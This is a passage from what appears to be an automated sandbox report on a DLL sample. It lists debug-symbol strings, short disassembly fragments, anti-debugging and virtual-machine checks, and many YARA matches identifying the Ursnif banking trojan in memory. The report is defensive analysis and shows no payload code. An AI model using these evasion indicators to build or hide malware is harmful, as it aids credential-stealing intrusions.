                      Source: Binary string: propsys.pdb{: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb_:IE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb_POei source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbT$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: lbase.pdb source: WerFault.exe, 0000000D.00000003.552510597.0000000004D73000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbK@q source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbi: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbEPue source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbQPIer source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.586318313.00000000008D2000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000002.594044860.0000000002FE2000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbf$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbM:{E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb@$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdb@ source: WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb+:EE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.578932063.0000000004B9E000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbX$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbe: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbU:CEt source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbC:}E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdbCP{e. source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdbq:oE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbj7 source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.828952358.000000006E83B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829929626.000000006E83B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: sechost.pdbw:aE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.552382095.0000000002F9A000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.558219704.00000000034E6000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb!:_Er source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbY:wE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbIPae source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbH7|E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbN$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdbo: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbR$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbwPge source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E7C2150 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E7C21A3 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C4ABE0 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C4AF13 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E7FAB9A push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_008FABE0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_008FAF13 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E7FAB9A push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0043CA68 push esp; retf 0043h
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E7C1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match, file source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
Source: Yara match, file source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (21 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (60 occurrences)
Source: WerFault.exe, 00000010.00000002.594844091.0000000005290000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmp, WerFault.exe, 00000010.00000002.594924398.00000000052E2000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.605872218.0000000004B13000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000003.710966842.0000000002C72000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: WerFault.exe, 0000000D.00000002.591098165.0000000004CA2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E806CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E7C1DE5 LoadLibraryA,GetProcAddress,
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E81C325 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E828861 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E86DFDA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E86DEAA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E86DBB5 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E81C325 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E828861 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E86DFDA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E86DEAA mov eax, dword ptr fs:[00000030h]
